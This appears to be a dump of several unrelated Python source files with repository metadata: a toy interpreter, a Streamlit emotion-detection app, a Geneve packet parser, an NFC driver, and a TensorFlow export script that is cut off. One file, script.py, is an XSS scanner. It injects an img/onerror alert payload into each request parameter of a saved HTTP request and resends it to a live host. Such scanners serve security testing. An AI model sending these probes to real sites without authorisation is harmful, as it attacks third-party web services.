import argparse import baloney.parser as baloney_parser from baloney.interpreter import BaloneyInterpreter parser = argparse.ArgumentParser() parser.add_argument('--lex', type=bool) parser.add_argument("file", type=str, help="Target .bs file") def run_lexer(source): from baloney.lexer import lexer lexer.input(source) while True: tok = lexer.token() if not tok: break # No more input print(tok) def main(args): with open(args.file, 'rb') as source: source_str = source.read() if args.lex: run_lexer(source_str) else: program = baloney_parser.parse(source_str) if not program: raise SystemExit interpreted_program = BaloneyInterpreter(prog) try: b.run() raise SystemExit except RuntimeError: pass if __name__ == '__main__': args = parser.parse_args() main(args)
579
0
46
e0cad9a632da0f19e6edc97400a819c5abc7284c
2,088
py
Python
app.py
totoropo/Emotion-Detection-
cbecd89a0693f44ad2abc29fd96320841f875ad9
[ "RSA-MD" ]
3
2021-06-18T10:21:02.000Z
2021-06-21T05:54:38.000Z
app.py
tsangharry/Emotion-Detection-
cbecd89a0693f44ad2abc29fd96320841f875ad9
[ "RSA-MD" ]
null
null
null
app.py
tsangharry/Emotion-Detection-
cbecd89a0693f44ad2abc29fd96320841f875ad9
[ "RSA-MD" ]
null
null
null
import streamlit as st import cv2 import os from inference import return_annotated_images from tensorflow.keras.models import load_model from streamlit_webrtc import ( ClientSettings, VideoTransformerBase, WebRtcMode, webrtc_streamer, ) WEBRTC_CLIENT_SETTINGS = ClientSettings( rtc_configuration={"iceServers": [{"urls": ["stun:stun.l.google.com:19302"]}]}, media_stream_constraints={"video": True, "audio": False}, ) def app_object_detection(): """Launches video with webrtc, calls annotated images. Returns: video : Annotated video. """ webrtc_ctx = webrtc_streamer( key="object-detection", mode=WebRtcMode.SENDRECV, client_settings=WEBRTC_CLIENT_SETTINGS, video_transformer_factory=NNVideoTransformer, async_transform=True) if webrtc_ctx.video_transformer: webrtc_ctx.video_transformer.confidence_threshold = 0.5 def main(): """ Streamlit interface. """ page_bg_img = ''' <style> body { background-image: url("https://www.fg-a.com/wallpapers/white-marble-1-2018.jpg"); background-size: cover; } </style> ''' st.markdown(page_bg_img, unsafe_allow_html=True) st.header("Emotion Detection from Facial Expressions") st.subheader('Unable to tell emotions like Sheldon Cooper? Let us help.') st.subheader('😀😮😔😡😐') app_object_detection() main()
27.84
92
0.665709
import streamlit as st import cv2 import os from inference import return_annotated_images from tensorflow.keras.models import load_model from streamlit_webrtc import ( ClientSettings, VideoTransformerBase, WebRtcMode, webrtc_streamer, ) WEBRTC_CLIENT_SETTINGS = ClientSettings( rtc_configuration={"iceServers": [{"urls": ["stun:stun.l.google.com:19302"]}]}, media_stream_constraints={"video": True, "audio": False}, ) def app_object_detection(): """Launches video with webrtc, calls annotated images. Returns: video : Annotated video. """ class NNVideoTransformer(VideoTransformerBase): def __init__(self): prototxtPath = os.path.sep.join(['face_detector', "deploy.prototxt"]) weightsPath = os.path.sep.join(['face_detector', "res10_300x300_ssd_iter_140000.caffemodel"]) self.faceNet = cv2.dnn.readNet(prototxtPath, weightsPath) self.emotionsNet = load_model('model/emo.h5') def transform(self, frame): image = frame.to_ndarray(format="bgr24") annotated_image = return_annotated_images(image, self.faceNet, self.emotionsNet) return annotated_image webrtc_ctx = webrtc_streamer( key="object-detection", mode=WebRtcMode.SENDRECV, client_settings=WEBRTC_CLIENT_SETTINGS, video_transformer_factory=NNVideoTransformer, async_transform=True) if webrtc_ctx.video_transformer: webrtc_ctx.video_transformer.confidence_threshold = 0.5 def main(): """ Streamlit interface. """ page_bg_img = ''' <style> body { background-image: url("https://www.fg-a.com/wallpapers/white-marble-1-2018.jpg"); background-size: cover; } </style> ''' st.markdown(page_bg_img, unsafe_allow_html=True) st.header("Emotion Detection from Facial Expressions") st.subheader('Unable to tell emotions like Sheldon Cooper? Let us help.') st.subheader('😀😮😔😡😐') app_object_detection() main()
546
26
88
92c03b96267c810090cd7e2215635b87807b5c40
6,913
py
Python
fluxory/lib/packet/geneve.py
viniarck/fluxory
a00b930785039b81807290d585c6b2a31142e9d2
[ "Apache-2.0" ]
null
null
null
fluxory/lib/packet/geneve.py
viniarck/fluxory
a00b930785039b81807290d585c6b2a31142e9d2
[ "Apache-2.0" ]
13
2019-04-03T15:08:45.000Z
2019-05-17T23:10:16.000Z
fluxory/lib/packet/geneve.py
viniarck/fluxory
a00b930785039b81807290d585c6b2a31142e9d2
[ "Apache-2.0" ]
null
null
null
# Copyright (C) 2016 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """ Geneve packet parser/serializer """ import struct from fluxory.lib import stringify from fluxory.lib import type_desc from . import packet_base from . import ether_types UDP_DST_PORT = 6081 class geneve(packet_base.PacketBase): """Geneve (RFC draft-ietf-nvo3-geneve-03) header encoder/decoder class. An instance has the following attributes at least. Most of them are same to the on-wire counterparts but in host byte order. __init__ takes the corresponding args in this order. ============== ======================================================== Attribute Description ============== ======================================================== version Version. opt_len The length of the options fields. flags Flag field for OAM packet and Critical options present. protocol Protocol Type field. The Protocol Type is defined as "ETHER TYPES". vni Identifier for unique element of virtual network. options List of ``Option*`` instance. ============== ======================================================== """ _HEADER_FMT = "!BBHI" _MIN_LEN = struct.calcsize(_HEADER_FMT) # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |Ver| Opt Len |O|C| Rsvd. 
| Protocol Type | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Virtual Network Identifier (VNI) | Reserved | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Variable Length Options | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # Flags OAM_PACKET_FLAG = 1 << 7 CRITICAL_OPTIONS_FLAG = 1 << 6 @classmethod class Option(stringify.StringifyMixin, type_desc.TypeDisp): """ Tunnel Options """ _OPTION_PACK_STR = "!HBB" _OPTION_LEN = struct.calcsize(_OPTION_PACK_STR) # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Option Class | Type |R|R|R| Length | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Variable Option Data | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ @classmethod @classmethod @Option.register_unknown_type() class OptionDataUnknown(Option): """ Unknown Option Class and Type specific Option """ @classmethod
36.193717
77
0.542022
# Copyright (C) 2016 Nippon Telegraph and Telephone Corporation. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. """ Geneve packet parser/serializer """ import struct from fluxory.lib import stringify from fluxory.lib import type_desc from . import packet_base from . import ether_types UDP_DST_PORT = 6081 class geneve(packet_base.PacketBase): """Geneve (RFC draft-ietf-nvo3-geneve-03) header encoder/decoder class. An instance has the following attributes at least. Most of them are same to the on-wire counterparts but in host byte order. __init__ takes the corresponding args in this order. ============== ======================================================== Attribute Description ============== ======================================================== version Version. opt_len The length of the options fields. flags Flag field for OAM packet and Critical options present. protocol Protocol Type field. The Protocol Type is defined as "ETHER TYPES". vni Identifier for unique element of virtual network. options List of ``Option*`` instance. ============== ======================================================== """ _HEADER_FMT = "!BBHI" _MIN_LEN = struct.calcsize(_HEADER_FMT) # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # |Ver| Opt Len |O|C| Rsvd. 
| Protocol Type | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Virtual Network Identifier (VNI) | Reserved | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Variable Length Options | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # Flags OAM_PACKET_FLAG = 1 << 7 CRITICAL_OPTIONS_FLAG = 1 << 6 def __init__(self, version=0, opt_len=0, flags=0, protocol=ether_types.ETH_TYPE_TEB, vni=None, options=None): super(geneve, self).__init__() self.version = version self.opt_len = opt_len assert (flags & 0x3F) == 0 self.flags = flags self.protocol = protocol self.vni = vni for o in options: assert isinstance(o, Option) self.options = options @classmethod def parser(cls, buf): (ver_opt_len, flags, protocol, vni) = struct.unpack_from(cls._HEADER_FMT, buf) version = ver_opt_len >> 6 # The Opt Len field expressed in four byte multiples. opt_len = (ver_opt_len & 0x3F) * 4 opt_bin = buf[cls._MIN_LEN:cls._MIN_LEN + opt_len] options = [] while opt_bin: option, opt_bin = Option.parser(opt_bin) options.append(option) msg = cls(version, opt_len, flags, protocol, vni >> 8, options) from . import ethernet geneve._TYPES = ethernet.ethernet._TYPES geneve.register_packet_type(ethernet.ethernet, ether_types.ETH_TYPE_TEB) return (msg, geneve.get_packet_type(protocol), buf[cls._MIN_LEN + opt_len:]) def serialize(self, payload=None, prev=None): tunnel_options = bytearray() for o in self.options: tunnel_options += o.serialize() self.opt_len = len(tunnel_options) # The Opt Len field expressed in four byte multiples. 
opt_len = self.opt_len // 4 return (struct.pack(self._HEADER_FMT, (self.version << 6) | opt_len, self.flags, self.protocol, self.vni << 8) + tunnel_options) class Option(stringify.StringifyMixin, type_desc.TypeDisp): """ Tunnel Options """ _OPTION_PACK_STR = "!HBB" _OPTION_LEN = struct.calcsize(_OPTION_PACK_STR) # 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Option Class | Type |R|R|R| Length | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ # | Variable Option Data | # +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ def __init__(self, option_class=None, type_=None, length=0): super(Option, self).__init__() if option_class is None or type_ is None: (option_class, type_) = self._rev_lookup_type(self.__class__) self.option_class = option_class self.type = type_ self.length = length @classmethod def parse_value(cls, buf): # Sub-classes should override this method, if needed. return {} def serialize_value(self): # Sub-classes should override this method, if needed. return b'' @classmethod def parser(cls, buf): (option_class, type_, length) = struct.unpack_from(cls._OPTION_PACK_STR, buf) # The Length field expressed in four byte multiples. length *= 4 subcls = Option._lookup_type((option_class, type_)) return ( subcls(option_class=option_class, type_=type_, length=length, **subcls.parse_value( buf[cls._OPTION_LEN:cls._OPTION_LEN + length])), buf[cls._OPTION_LEN + length:]) def serialize(self, _payload=None, _prev=None): data = self.serialize_value() self.length = len(data) # The Length field expressed in four byte multiples. 
length = self.length // 4 return (struct.pack(self._OPTION_PACK_STR, int(self.option_class), self.type, length) + data) @Option.register_unknown_type() class OptionDataUnknown(Option): """ Unknown Option Class and Type specific Option """ def __init__(self, buf, option_class=None, type_=None, length=0): super(OptionDataUnknown, self).__init__(option_class=option_class, type_=type_, length=length) self.buf = buf @classmethod def parse_value(cls, buf): return {"buf": buf} def serialize_value(self): return self.buf
3,316
0
292
463b9880708ab93eb7c556b07a756c4f2a013afe
4,116
py
Python
adafruit_pn532/i2c.py
dunkmann00/Adafruit_CircuitPython_PN532
b741c77cee4c1fce61bc478b6afa2e11528389f9
[ "MIT" ]
null
null
null
adafruit_pn532/i2c.py
dunkmann00/Adafruit_CircuitPython_PN532
b741c77cee4c1fce61bc478b6afa2e11528389f9
[ "MIT" ]
null
null
null
adafruit_pn532/i2c.py
dunkmann00/Adafruit_CircuitPython_PN532
b741c77cee4c1fce61bc478b6afa2e11528389f9
[ "MIT" ]
null
null
null
# Adafruit PN532 NFC/RFID control library. # Author: Tony DiCola # # The MIT License (MIT) # # Copyright (c) 2015-2018 Adafruit Industries # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """ ``adafruit_pn532.i2c`` ==================================================== This module will let you communicate with a PN532 RFID/NFC shield or breakout using I2C. * Author(s): Original Raspberry Pi code by Tony DiCola, CircuitPython by ladyada, refactor by Carter Nelson """ __version__ = "0.0.0-auto.0" __repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_PN532.git" import time import adafruit_bus_device.i2c_device as i2c_device from digitalio import Direction from micropython import const from adafruit_pn532.adafruit_pn532 import PN532, BusyError _I2C_ADDRESS = const(0x24) class PN532_I2C(PN532): """Driver for the PN532 connected over I2C.""" def __init__(self, i2c, *, irq=None, reset=None, req=None, debug=False): """Create an instance of the PN532 class using I2C. 
Note that PN532 uses clock stretching. Optional IRQ pin (not used), reset pin and debugging output. """ self.debug = debug self._req = req self._i2c = i2c_device.I2CDevice(i2c, _I2C_ADDRESS) super().__init__(debug=debug, irq=irq, reset=reset) def _wakeup(self): # pylint: disable=no-self-use """Send any special commands/data to wake up PN532""" if self._reset_pin: self._reset_pin.value = True time.sleep(0.01) if self._req: self._req.direction = Direction.OUTPUT self._req.value = False time.sleep(0.01) self._req.value = True time.sleep(0.01) self.low_power = False self.SAM_configuration() # Put the PN532 back in normal mode def _wait_ready(self, timeout=1): """Poll PN532 if status byte is ready, up to `timeout` seconds""" status = bytearray(1) timestamp = time.monotonic() while (time.monotonic() - timestamp) < timeout: try: with self._i2c: self._i2c.readinto(status) except OSError: continue if status == b"\x01": return True # No longer busy time.sleep(0.01) # lets ask again soon! # Timed out! return False def _read_data(self, count): """Read a specified count of bytes from the PN532.""" # Build a read request frame. frame = bytearray(count + 1) with self._i2c as i2c: i2c.readinto(frame, end=1) # read status byte! if frame[0] != 0x01: # not ready raise BusyError i2c.readinto(frame) # ok get the data, plus statusbyte if self.debug: print("Reading: ", [hex(i) for i in frame[1:]]) return frame[1:] # don't return the status byte def _write_data(self, framebytes): """Write a specified count of bytes to the PN532""" with self._i2c as i2c: i2c.write(framebytes)
37.761468
81
0.649417
# Adafruit PN532 NFC/RFID control library. # Author: Tony DiCola # # The MIT License (MIT) # # Copyright (c) 2015-2018 Adafruit Industries # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. """ ``adafruit_pn532.i2c`` ==================================================== This module will let you communicate with a PN532 RFID/NFC shield or breakout using I2C. * Author(s): Original Raspberry Pi code by Tony DiCola, CircuitPython by ladyada, refactor by Carter Nelson """ __version__ = "0.0.0-auto.0" __repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_PN532.git" import time import adafruit_bus_device.i2c_device as i2c_device from digitalio import Direction from micropython import const from adafruit_pn532.adafruit_pn532 import PN532, BusyError _I2C_ADDRESS = const(0x24) class PN532_I2C(PN532): """Driver for the PN532 connected over I2C.""" def __init__(self, i2c, *, irq=None, reset=None, req=None, debug=False): """Create an instance of the PN532 class using I2C. 
Note that PN532 uses clock stretching. Optional IRQ pin (not used), reset pin and debugging output. """ self.debug = debug self._req = req self._i2c = i2c_device.I2CDevice(i2c, _I2C_ADDRESS) super().__init__(debug=debug, irq=irq, reset=reset) def _wakeup(self): # pylint: disable=no-self-use """Send any special commands/data to wake up PN532""" if self._reset_pin: self._reset_pin.value = True time.sleep(0.01) if self._req: self._req.direction = Direction.OUTPUT self._req.value = False time.sleep(0.01) self._req.value = True time.sleep(0.01) self.low_power = False self.SAM_configuration() # Put the PN532 back in normal mode def _wait_ready(self, timeout=1): """Poll PN532 if status byte is ready, up to `timeout` seconds""" status = bytearray(1) timestamp = time.monotonic() while (time.monotonic() - timestamp) < timeout: try: with self._i2c: self._i2c.readinto(status) except OSError: continue if status == b"\x01": return True # No longer busy time.sleep(0.01) # lets ask again soon! # Timed out! return False def _read_data(self, count): """Read a specified count of bytes from the PN532.""" # Build a read request frame. frame = bytearray(count + 1) with self._i2c as i2c: i2c.readinto(frame, end=1) # read status byte! if frame[0] != 0x01: # not ready raise BusyError i2c.readinto(frame) # ok get the data, plus statusbyte if self.debug: print("Reading: ", [hex(i) for i in frame[1:]]) return frame[1:] # don't return the status byte def _write_data(self, framebytes): """Write a specified count of bytes to the PN532""" with self._i2c as i2c: i2c.write(framebytes)
0
0
0
606edc3070bd5e542a9a768c731f9e95ef340f46
4,670
py
Python
script.py
AleksMVP/mitm-proxy
89c1ee40b78aecb0621c28515906ba635c98c7d8
[ "MIT" ]
2
2021-06-06T14:06:19.000Z
2021-11-30T19:12:38.000Z
script.py
AleksMVP/myproxy
89c1ee40b78aecb0621c28515906ba635c98c7d8
[ "MIT" ]
1
2021-12-11T18:30:39.000Z
2022-02-27T15:39:34.000Z
script.py
AleksMVP/myproxy
89c1ee40b78aecb0621c28515906ba635c98c7d8
[ "MIT" ]
2
2021-06-06T15:21:52.000Z
2021-08-12T10:15:10.000Z
from http.server import BaseHTTPRequestHandler import http import argparse from urllib.parse import urlparse from urllib.parse import urlencode from urllib.parse import parse_qs from urllib.parse import unquote import socket, ssl, pprint from io import BytesIO XSS = "'\"><img src=\"\" onerror=alert(\"\")>" FILE_PATH = "/Users/aleks/Desktop/tp-thirdsem/myproxy/requests/POSTauth.mail.rufe133c21211f65cb1240f2354a24b4eac6be149529c92188d25ee97e149666db" if __name__ == "__main__": parser = argparse.ArgumentParser(description="Search vulnarabilities") parser.add_argument("-f", "--filepath", metavar="", required=True, type=argparse.FileType('r'), help="path to file with request") parser.add_argument("-b", "--body", action="store_true", help="flag to check body params") parser.add_argument("-q", "--query", action="store_true", help="flag to check query params") args = parser.parse_args() request_str = "" # we don't really need this because it's python but ... request_lines = args.filepath.readlines() request_str = "".join(request_lines) searcher = VulnerabilitySearcher(request_str) if args.query: searcher.check_query_params() if args.body: searcher.check_body_params()
34.850746
144
0.631906
from http.server import BaseHTTPRequestHandler import http import argparse from urllib.parse import urlparse from urllib.parse import urlencode from urllib.parse import parse_qs from urllib.parse import unquote import socket, ssl, pprint from io import BytesIO XSS = "'\"><img src=\"\" onerror=alert(\"\")>" FILE_PATH = "/Users/aleks/Desktop/tp-thirdsem/myproxy/requests/POSTauth.mail.rufe133c21211f65cb1240f2354a24b4eac6be149529c92188d25ee97e149666db" def make_https_request(host, data): port = 443 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.settimeout(10) ssl_sock = ssl.wrap_socket(s) ssl_sock.connect((host, port)) ssl_sock.sendall(data.encode()) data = ssl_sock.recv(100000024) return data.decode() def make_http_request(host, data): port = 80 with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: ssl_sock = s ssl_sock.connect((host, port)) ssl_sock.sendall(data.encode()) data = ssl_sock.recv(1000024) return data.decode() def prepare_query(query_array): for key in query_array.keys(): query_array[key] = query_array[key][0] def generate_xss_dict(query_array): for key in query_array.keys(): old_value = query_array[key] query_array[key] = XSS yield dict(query_array) query_array[key] = old_value class HTTPRequest(BaseHTTPRequestHandler): def __init__(self, request_text): self.rfile = BytesIO(request_text) self.raw_requestline = self.rfile.readline() self.error_code = self.error_message = None self.parse_request() def send_error(self, code, message): self.error_code = code self.error_message = message class VulnerabilitySearcher: def __init__(self, request): self.request = request def check_query_params(self): request = HTTPRequest(self.request.encode()) host = request.headers["Host"] parsed_url = urlparse(request.path) parsed_query = parse_qs(parsed_url.query) if parsed_query: prepare_query(parsed_query) for i in generate_xss_dict(parsed_query): print(f"New query params: {i}") query_string = urlencode(i) new_request = 
self.request.replace(parsed_url.query, unquote(query_string)) response = make_https_request(host, new_request) if response.find(XSS) != -1: print(f"Found: {i}") def check_body_params(self): request = HTTPRequest(self.request.encode()) host = request.headers["Host"] if "Content-Type" in request.headers.keys() and \ request.headers["Content-Type"] == "application/x-www-form-urlencoded": pattern = "\n\n" pos = request_str.find(pattern) request_body = request_str[pos+len(pattern):] parsed_body_parameters = parse_qs(request_body) prepare_query(parsed_body_parameters) if parsed_body_parameters: for i in generate_xss_dict(parsed_body_parameters): print(f"New body params: {i}") query_string = urlencode(i) old_content_length = f"Content-Length: {request.headers['Content-Length']}" new_content_length = f"Content-Length: {len(unquote(query_string))}" new_request = self.request.replace( request_body, unquote(query_string) ).replace( old_content_length, new_content_length ) response = make_https_request(host, new_request) if response.find(XSS) != -1: print(f"Found: {i}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="Search vulnarabilities") parser.add_argument("-f", "--filepath", metavar="", required=True, type=argparse.FileType('r'), help="path to file with request") parser.add_argument("-b", "--body", action="store_true", help="flag to check body params") parser.add_argument("-q", "--query", action="store_true", help="flag to check query params") args = parser.parse_args() request_str = "" # we don't really need this because it's python but ... request_lines = args.filepath.readlines() request_str = "".join(request_lines) searcher = VulnerabilitySearcher(request_str) if args.query: searcher.check_query_params() if args.body: searcher.check_body_params()
3,119
28
271
b1892cce88651cc532dbfc88347950e86e324f77
8,579
py
Python
cvm/tests/test_tensorflow.py
CortexFoundation/tvm-cvm
d8941dc60a51dd27a6d2accc1eff2eced3b3640d
[ "Apache-2.0" ]
6
2019-07-04T09:42:53.000Z
2021-12-28T13:19:48.000Z
cvm/tests/test_tensorflow.py
CortexFoundation/tvm-cvm
d8941dc60a51dd27a6d2accc1eff2eced3b3640d
[ "Apache-2.0" ]
4
2019-06-27T08:05:18.000Z
2021-09-09T18:59:11.000Z
cvm/tests/test_tensorflow.py
CortexFoundation/tvm-cvm
d8941dc60a51dd27a6d2accc1eff2eced3b3640d
[ "Apache-2.0" ]
null
null
null
import tensorflow as tf import utils from tensorflow.keras import backend as K from tensorflow.keras.models import load_model # from keras import backend as K # from keras.models import load_model # from tensorflow.python.keras import backend as K def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True): """ Freezes the state of a session into a pruned computation graph. Creates a new computation graph where variable nodes are replaced by constants taking their current value in the session. The new graph will be pruned so subgraphs that are not necessary to compute the requested outputs are removed. @param session The TensorFlow session to be frozen. @param keep_var_names A list of variable names that should not be frozen, or None to freeze all the variables in the graph. @param output_names Names of the relevant graph outputs. @param clear_devices Remove the device directives from the graph for better portability. @return The frozen graph definition. """ from tensorflow.python.framework.graph_util import convert_variables_to_constants graph = session.graph with graph.as_default(): freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or [])) output_names = output_names or [] output_names += [v.op.name for v in tf.global_variables()] # Graph -> GraphDef ProtoBuf input_graph_def = graph.as_graph_def() if clear_devices: for node in input_graph_def.node: node.device = "" frozen_graph = convert_variables_to_constants(session, input_graph_def, output_names, freeze_var_names) return frozen_graph import os from tvm.relay.frontend import tensorflow_parser as tp from official.vision.image_classification import resnet_model as resm from tensorflow.python.framework.graph_util import convert_variables_to_constants import keras_applications as kapp import keras from tensorflow_parser import TFParser from tensorflow.python.framework import dtypes import mxnet as mx if __name__ == '__main__': 
utils.log_init() # net = keras.applications.resnet.ResNet50(weights='imagenet') # net = tf.keras.applications.ResNet50(weights='imagenet') # net = tf.keras.applications.InceptionV3(weights='imagenet') # net = keras.applications.InceptionV3(weights='imagenet') net = tf.keras.applications.MobileNet(weights='imagenet') # dump_model(net, "/data/tfmodels/resnet50_v1_new") # load_imagenet() test_tf_parser()
38.819005
111
0.659751
import tensorflow as tf import utils from tensorflow.keras import backend as K from tensorflow.keras.models import load_model # from keras import backend as K # from keras.models import load_model # from tensorflow.python.keras import backend as K def freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True): """ Freezes the state of a session into a pruned computation graph. Creates a new computation graph where variable nodes are replaced by constants taking their current value in the session. The new graph will be pruned so subgraphs that are not necessary to compute the requested outputs are removed. @param session The TensorFlow session to be frozen. @param keep_var_names A list of variable names that should not be frozen, or None to freeze all the variables in the graph. @param output_names Names of the relevant graph outputs. @param clear_devices Remove the device directives from the graph for better portability. @return The frozen graph definition. """ from tensorflow.python.framework.graph_util import convert_variables_to_constants graph = session.graph with graph.as_default(): freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or [])) output_names = output_names or [] output_names += [v.op.name for v in tf.global_variables()] # Graph -> GraphDef ProtoBuf input_graph_def = graph.as_graph_def() if clear_devices: for node in input_graph_def.node: node.device = "" frozen_graph = convert_variables_to_constants(session, input_graph_def, output_names, freeze_var_names) return frozen_graph import os from tvm.relay.frontend import tensorflow_parser as tp from official.vision.image_classification import resnet_model as resm from tensorflow.python.framework.graph_util import convert_variables_to_constants def dump_resnet50_v1(): root = "/tmp/tfmodels" model = resm.resnet50(1000) # model.compile(optimizer=tf.keras.optimizers.Adam(), # loss=tf.keras.losses.sparse_categorical_crossentropy, # 
metrics=['accuracy']) os.makedirs(root, exist_ok=True) model.save(os.path.join(root, "keras.h5")) # tf.contrib.saved_model.save_keras_model(model, root, # serving_only=False) K.set_learning_phase(0) model = load_model(os.path.join(root, "keras.h5")) print("DDDDDDD", model.outputs) frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs]) # with K.get_session() as sess: # frozen_graph = convert_variables_to_constants(sess, sess.graph_def, # [x.op.name for x in model.outputs]) tf.train.write_graph(frozen_graph, root, "resnet50_v1.pb", as_text=False) def dump_pretrain_resnet50_v1(): root = "/tmp/tf/resnet50_v1" os.makedirs(root, exist_ok=True) # resnet50_v1 = tf.keras.applications.ResNet50(weights=None) resnet50_v1 = tf.keras.applications.ResNet50(weights='imagenet') resnet50_v1.save(os.path.join(root, "model.h5")) K.set_learning_phase(0) model = load_model(os.path.join(root, "model.h5")) print ("ResNet50_V1 Model: ", model.outputs) frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs]) tf.train.write_graph(frozen_graph, root, "model.pb", as_text=False) import keras_applications as kapp def preprocess_image(image): image = tf.image.decode_jpeg(image, channels=3) image = tf.image.resize_images(image, [224, 224]) # image /= 255.0 # normalize to [0,1] range # image = kapp.resnet.preprocess_input(image) image = tf.keras.applications.resnet50.preprocess_input(image) print (image.numpy().min(), image.numpy().max()) return image def load_and_preprocess_image(path): image = tf.read_file(path) return preprocess_image(image) def load_and_preprocess_from_path_label(path, label): return load_and_preprocess_image(path), label def load_imagenet(): data_root = os.path.expanduser("~/.mxnet/datasets/imagenet/val") print (data_root) import random import pathlib data_root = pathlib.Path(data_root) all_image_paths = list(data_root.glob('*/*')) all_image_paths = [str(path) for path in all_image_paths] 
